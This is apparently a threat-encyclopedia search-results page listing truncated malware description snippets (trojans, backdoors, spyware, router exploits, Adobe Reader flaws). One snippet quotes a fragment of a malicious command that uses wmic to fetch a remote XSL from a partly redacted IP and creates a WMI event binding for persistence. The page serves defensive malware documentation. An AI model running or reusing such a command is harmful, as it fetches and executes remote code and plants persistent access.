Search
Keyword: os2first
Download Routine This Backdoor takes advantage of the following software vulnerabilities to allow a remote user or malware/grayware to download files: D-Link DSL-2750B - OS Command Injection GPON Routers -
Programs System Locale Time Zone Type User Accounts Virtual Memory Information Wifi Network Credentials Windows Firewall Status OS Information Name Version Manufacturer Configuration Build Type Registered
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This potentially unwanted application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be manually installed
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It arrives as a component bundled with malware/grayware
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
\ Internet Account Manager\Accounts\VeriSign LDAP Server ID = "2" HKEY_CURRENT_USER\Software\Microsoft\ Internet Account Manager\Accounts\WhoWhere LDAP Server ID = "3" HKEY_CURRENT_USER\Software\Microsoft
This Potentially Unwanted Application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
}e.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://{BLOCKED}.{BLOCKED}.155.170:8170/s.xsl\"" cmd /c start wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=
installation. Once an AV is found, it sends this information along with the OS version as parameter to a certain URL. This backdoor arrives on a system as a file dropped by other malware or as a file downloaded
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This backdoor arrives on a system as a
/tmp/moni.lod /tmp/notify.file Information Theft This Backdoor gathers the following data: OS name OS version CPU clock rate CPU usage Number of CPU cores Network usage RAM size IP address of infected machine
address Host's IP address Infomation about network interfaces Number of CPU cores OS name OS version RAM Other Details This Backdoor does the following: This malware replaces the following files with copies
the following data: Computer Name Host Name Public IP Address OS Version User Name OS platform Installed programs Other Details This spyware connects to the following URL(s) to check for an Internet
This spyware arrives as a component bundled with malware/grayware packages. It connects to certain websites to send and receive information. Arrival Details This spyware arrives as a component
\ services\CornerSunshineSvc Start = "2" (SERVICE_AUTO_START) HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ services\CornerSunshineSvc Type = "272" Dropping Routine This potentially unwanted application drops the
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.